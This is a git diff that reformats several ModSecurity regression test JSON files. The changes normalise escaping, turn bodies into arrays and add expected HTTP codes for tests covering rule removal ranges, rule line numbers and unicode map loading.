"/test.pl?foo=£&bar=%C2%A3", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", + "Content-Type": "text/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" - } + }, + "body": [ + "" + ] }, "expected": { - "http_code": 200, - "debug_log": "Target value: \"1\"" + "debug_log": "Target value: \"1\"", + "http_code": 200 }, "rules": [ "SecRuleEngine On", @@ -150,7 +166,7 @@ "version_min": 209000, "version_max": -1, "title": "Invalid actions break CRS 3.1 on rule 912160 - 4", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1830", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1830", "client": { "ip": "200.249.12.31", "port": 2313 @@ -163,7 +179,7 @@ "headers": { "Host": "net.tutsplus.com", "User-Agent": "", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -173,20 +189,25 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?foo=£&bar=%C2%A3", + "uri": "/test.pl?foo=£&bar=%C2%A3", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", + "Content-Type": "text/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" - } + }, + "body": [ + "" + ] }, "expected": { - "http_code": 200, - "debug_log": "GLOBAL:alerted_970018_iisDefLoc with value: 1" + "debug_log": "GLOBAL:alerted_970018_iisDefLoc with value: 1", + "http_code": 200 }, "rules": [ "SecRuleEngine On", @@ -195,6 +216,3 @@ ] } ] - - - diff --git a/test/test-cases/regression/issue-1844.json b/test/test-cases/regression/issue-1844.json index 6ccb1f5e8a..01b6926ca6 100644 --- a/test/test-cases/regression/issue-1844.json +++ b/test/test-cases/regression/issue-1844.json @@ -1,279 +1,284 @@ [ { - "enabled":1, - "version_min":300000, - "title":"m_lineNumber ... mapping ... correct line number in file (1/n)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "m_lineNumber ... mapping ... correct line number in file (1/n)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded", "Authorization": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=test1¶m2=value2" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"line \"29\"" + "expected": { + "error_log": "line \"29\"", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule WEBAPPID \"@contains test1\" \"id:1,phase:3,pass,t:trim\"", "Include test-cases/data/big-file.conf" ] }, { - "enabled":1, - "version_min":300000, - "title":"m_lineNumber ... mapping ... correct line number in file (2/n)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "m_lineNumber ... mapping ... correct line number in file (2/n)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded", "Authorization": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=test2" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"line \"55\"" + "expected": { + "error_log": "line \"55\"", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule WEBAPPID \"@contains test2\" \"id:1,phase:3,pass,t:trim\"", "Include test-cases/data/big-file.conf" ] }, { - "enabled":1, - "version_min":300000, - "title":"m_lineNumber ... mapping ... correct line number in file (3/n)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "m_lineNumber ... mapping ... correct line number in file (3/n)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded", "Authorization": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=test3" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"line \"84\"" + "expected": { + "error_log": "line \"84\"", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule WEBAPPID \"@contains test3\" \"id:1,phase:3,pass,t:trim\"", "Include test-cases/data/big-file.conf" ] }, { - "enabled":1, - "version_min":300000, - "title":"m_lineNumber ... mapping ... correct line number in file (4/n)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "m_lineNumber ... mapping ... correct line number in file (4/n)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded", "Authorization": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=test4" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"line \"116\"" + "expected": { + "error_log": "line \"116\"", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule WEBAPPID \"@contains test3\" \"id:1,phase:3,pass,t:trim\"", "Include test-cases/data/big-file.conf" ] }, { - "enabled":1, - "version_min":300000, - "title":"m_lineNumber ... mapping ... correct line number in file (5/n)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "m_lineNumber ... mapping ... correct line number in file (5/n)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded", "Authorization": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=test5" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"line \"174\"" + "expected": { + "error_log": "line \"174\"", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule WEBAPPID \"@contains test3\" \"id:1,phase:3,pass,t:trim\"", "Include test-cases/data/big-file.conf" ] }, { - "enabled":1, - "version_min":300000, - "title":"m_lineNumber ... mapping ... correct line number in file (6/n)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "m_lineNumber ... mapping ... correct line number in file (6/n)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded", "Authorization": "Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=test5" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "error_log":"line \"174\"" + "expected": { + "error_log": "line \"174\"", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule WEBAPPID \"@contains test3\" \"id:1,phase:3,pass,t:trim\"", "Include test-cases/data/not-so-big-file.conf" ] } ] - diff --git a/test/test-cases/regression/issue-1850.json b/test/test-cases/regression/issue-1850.json index 75ac2bc5f6..9c67cf23f6 100644 --- a/test/test-cases/regression/issue-1850.json +++ b/test/test-cases/regression/issue-1850.json @@ -4,7 +4,7 @@ "version_min": 209000, "version_max": -1, "title": "Override the default status code if not suitable to redirect action", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1850", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1850", "client": { "ip": "200.249.12.31", "port": 2313 @@ -17,7 +17,7 @@ "headers": { "Host": "net.tutsplus.com", "User-Agent": "", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -27,16 +27,21 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?foo=£&bar=%C2%A3", + "uri": "/test.pl?foo=£&bar=%C2%A3", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", + "Content-Type": "text/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" - } + }, + "body": [ + "" + ] }, "expected": { "http_code": 302 diff --git a/test/test-cases/regression/issue-1941.json b/test/test-cases/regression/issue-1941.json index 0410ddad84..470c056a25 100644 --- a/test/test-cases/regression/issue-1941.json +++ b/test/test-cases/regression/issue-1941.json @@ -4,8 +4,35 @@ "version_min": 209000, "version_max": -1, "title": "Failed to load locate the unicode map file from: ... 1/n", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1941", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1941", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, "expected": { + "http_code": 200, "parser_error": "Failed to locate the unicode map file from: does-not-exist-unicode.mapping" }, "rules": [ @@ -18,9 +45,36 @@ "version_min": 209000, "version_max": -1, "title": "Failed to load locate the unicode map file from: ... 2/n", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1941", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1941", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, "expected": { - "parser_error": "Failed to locate the unicode map file from: um dois tres does-not-exist-unicode.mapping" + "http_code": 200, + "parser_error": "Failed to locate the unicode map file from: um dois tres does-not-exist-unicode.mapping" }, "rules": [ "SecRuleEngine On", @@ -32,9 +86,36 @@ "version_min": 209000, "version_max": -1, "title": "Failed to load locate the unicode map file from: ... 3/n", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1941", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1941", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, "expected": { - "parser_error": "Invalid input: SecUnicodeMapFile does-not-exist-unicode.mapping eita" + "http_code": 200, + "parser_error": "Invalid input: SecUnicodeMapFile does-not-exist-unicode.mapping eita" }, "rules": [ "SecRuleEngine On", @@ -57,8 +138,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -68,25 +149,27 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?param1= test ¶m2=test2&pparam=дор", + "uri": "/test.pl?param1= test ¶m2=test2&pparam=дор", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", + "Content-Type": "text/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" }, "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, "expected": { @@ -115,8 +198,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -126,25 +209,27 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?param1= test ¶m2=test2&pparam=дор", + "uri": "/test.pl?param1= test ¶m2=test2&pparam=дор", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", + "Content-Type": "text/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" }, "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, "expected": { diff --git a/test/test-cases/regression/issue-1943.json b/test/test-cases/regression/issue-1943.json index 7dd688d556..7a7e4b64b3 100644 --- a/test/test-cases/regression/issue-1943.json +++ b/test/test-cases/regression/issue-1943.json @@ -15,8 +15,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -26,25 +26,27 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?param1= test ¶m2=test2&pparam=дор", + "uri": "/test.pl?param1= test ¶m2=test2&pparam=дор", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", + "Content-Type": "text/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" }, "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, "expected": { @@ -72,8 +74,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -83,29 +85,30 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?param1= test ¶m2=test2&pparam=дор", + "uri": "/test.pl?param1= test ¶m2=test2&pparam=дор", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", + "Content-Type": "text/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" }, "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, "expected": { - "debug_log": "", "http_code": 200 }, "rules": [ diff --git a/test/test-cases/regression/issue-1956.json b/test/test-cases/regression/issue-1956.json index ead45da2a0..97315d3fcc 100644 --- a/test/test-cases/regression/issue-1956.json +++ b/test/test-cases/regression/issue-1956.json @@ -1,190 +1,210 @@ [ -{ - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "ctl:ruleRemoveById doesn't handle all ranges equally 1", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1956", - "gihub_issue": 1956, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { + { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "ctl:ruleRemoveById doesn't handle all ranges equally 1", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1956", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { "headers": { "Host": "www.google.com" }, - "uri": "\/test.pl?param1= test ¶m2=)", - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, + "uri": "/test.pl?param1= test ¶m2=)", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, "expected": { - "audit_log": "", "debug_log": "Rule id: 913104 was skipped due to a ruleRemoveById", - "error_log": "" + "http_code": 200 }, - "rules": [ + "rules": [ "SecRule REQUEST_URI \"@beginsWith /test\" \"id:1001,phase:request,pass,nolog,t:none,ctl:ruleRemoveById=913103-913105\"", "SecRule REQUEST_URI \"@beginsWith /test\" \"id:913104,phase:request,pass,nolog,t:none,msg:'whee'\"" ] }, { - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "ctl:ruleRemoveById doesn't handle all ranges equally 2", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1956", - "gihub_issue": 1956, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "ctl:ruleRemoveById doesn't handle all ranges equally 2", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1956", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { "headers": { "Host": "www.google.com" }, - "uri": "\/test.pl?param1= test ¶m2=)", - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, + "uri": "/test.pl?param1= test ¶m2=)", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, "expected": { - "audit_log": "", "debug_log": "Rule id: 913104 was skipped due to a ruleRemoveById", - "error_log": "" + "http_code": 200 }, - "rules": [ + "rules": [ "SecRule REQUEST_URI \"@beginsWith /test\" \"id:1001,phase:request,pass,nolog,t:none,ctl:ruleRemoveById=913104\"", "SecRule REQUEST_URI \"@beginsWith /test\" \"id:913104,phase:request,pass,nolog,t:none,msg:'whee'\"" ] }, { - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "ctl:ruleRemoveById doesn't handle all ranges equally 3", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1956", - "gihub_issue": 1956, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "ctl:ruleRemoveById doesn't handle all ranges equally 3", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1956", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { "headers": { "Host": "www.google.com" }, - "uri": "\/test.pl?param1= test ¶m2=)", - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, + "uri": "/test.pl?param1= test ¶m2=)", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, "expected": { - "audit_log": "", "debug_log": "Rule id: 913103 was skipped due to a ruleRemoveById", - "error_log": "" + "http_code": 200 }, - "rules": [ + "rules": [ "SecRule REQUEST_URI \"@beginsWith /test\" \"id:1001,phase:request,pass,nolog,t:none,ctl:ruleRemoveById=913103-913105\"", "SecRule REQUEST_URI \"@beginsWith /test\" \"id:913103,phase:request,pass,nolog,t:none,msg:'whee'\"" ] }, { - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "ctl:ruleRemoveById doesn't handle all ranges equally 4", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1956", - "gihub_issue": 1956, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "ctl:ruleRemoveById doesn't handle all ranges equally 4", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1956", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { "headers": { "Host": "www.google.com" }, - "uri": "\/test.pl?param1= test ¶m2=)", - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, + "uri": "/test.pl?param1= test ¶m2=)", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, "expected": { - "audit_log": "", "debug_log": "Rule id: 913105 was skipped due to a ruleRemoveById", - "error_log": "" + "http_code": 200 }, - "rules": [ + "rules": [ "SecRule REQUEST_URI \"@beginsWith /test\" \"id:1001,phase:request,pass,nolog,t:none,ctl:ruleRemoveById=913103-913105\"", "SecRule REQUEST_URI \"@beginsWith /test\" \"id:913105,phase:request,pass,nolog,t:none,msg:'whee'\"" ] }, { - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "ctl:ruleRemoveById doesn't handle all ranges equally 5", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1956", - "gihub_issue": 1956, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "ctl:ruleRemoveById doesn't handle all ranges equally 5", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1956", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { "headers": { "Host": "www.google.com" }, - "uri": "\/test.pl?param1= test ¶m2=)", - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, + "uri": "/test.pl?param1= test ¶m2=)", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, "expected": { - "audit_log": "", "debug_log": "Rule: 913102. Executing operator", - "error_log": "" + "http_code": 200 }, - "rules": [ + "rules": [ "SecRule REQUEST_URI \"@beginsWith /test\" \"id:1001,phase:request,pass,nolog,t:none,ctl:ruleRemoveById=913103-913105\"", "SecRule REQUEST_URI \"@beginsWith /test\" \"id:913102,phase:request,pass,nolog,t:none,msg:'whee'\"" ] diff --git a/test/test-cases/regression/issue-1960.json b/test/test-cases/regression/issue-1960.json index 5b288977cd..cdda24f54e 100644 --- a/test/test-cases/regression/issue-1960.json +++ b/test/test-cases/regression/issue-1960.json @@ -1,37 +1,40 @@ [ { - "enabled":1, - "version_min":300000, - "title":"SecRuleEngine DetectionOnly with disruptive SecDefaultAction", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleEngine DetectionOnly with disruptive SecDefaultAction", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ + "request": { + "headers": { "Host": "localhost" }, - "uri":"?a=a", - "method":"GET" + "uri": "?a=a", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - 